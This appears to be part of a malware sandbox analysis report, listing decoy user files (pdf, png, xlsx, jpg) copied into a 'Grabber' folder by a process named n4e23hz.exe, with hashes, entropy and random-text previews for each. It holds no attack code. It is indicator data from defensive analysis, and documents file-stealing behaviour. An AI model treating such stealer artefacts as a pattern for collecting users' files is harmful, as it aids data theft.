Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\BPMLNOBVSB.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702896917219035
Encrypted:	false
SSDEEP:	24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
MD5:	C68274AA8B7F713157BEBE2FCC2EA5D3
SHA1:	52A5A2D615A813B518DDAAC2A02095F1059DAAD5
SHA-256:	362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
SHA-512:	BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
Malicious:	false
Preview:	BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\JSDNGYCOWY.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690895772725941
Encrypted:	false
SSDEEP:	24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
MD5:	A002E80B55673139253599B753BDC01A
SHA1:	6AEEF831A5AAB9155AAABB52D173859E20A86932
SHA-256:	F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
SHA-512:	D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
Malicious:	false
Preview:	JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\NWTVCDUMOB.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
